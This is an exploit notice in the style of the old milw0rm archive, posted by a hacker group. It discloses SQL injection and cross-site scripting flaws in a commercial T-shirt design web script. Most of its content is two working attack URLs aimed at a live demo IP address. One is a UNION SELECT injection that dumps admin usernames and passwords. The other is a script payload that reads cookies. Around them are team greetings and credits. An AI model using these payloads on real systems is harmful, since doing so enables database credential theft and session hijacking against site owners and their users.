-------------------------AllaH AkbaR------------------------------- Custom T-shirt Design (SQL & xss) MULTIPLE Remote Sql Injection --------------------------------------------------------------------------- Discovered By: Snakespc ALGERIAN HaCkEr Mail: snakespc@gmail.com Site:www.snakespc.com/sc/index.php Chi3arona houa: -------------------------SNAKES TEAM------------------------------------- Script:2daybiz.com Demo:http://www.2daybiz.com/tshirt_design_download.html -------------------------SNAKES TEAM------------------------------------- Exploit: -------- Demo :sql http://98.131.92.231/demo/tshirt2/product.php?id=-28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+admin-- Demo: xss http://98.131.92.231/demo/tshirt2/product.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -------------------------SNAKES TEAM------------------------------------- His0k4:::Mr.HCOCA_MAN:::DrEaDFuL::: yassine_enpsunhouse2:::aSSaSSin_HaCkErS --------------------------SNAKES TEAM------------------------------------ ALL www.SnakespC.com/sc>>>> ( Members ) Str0ke >>>>>>>Milw0rm